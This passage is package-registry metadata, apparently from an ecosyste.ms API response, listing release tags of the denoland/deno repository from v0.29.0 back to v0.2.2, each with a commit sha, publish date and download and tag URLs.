09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag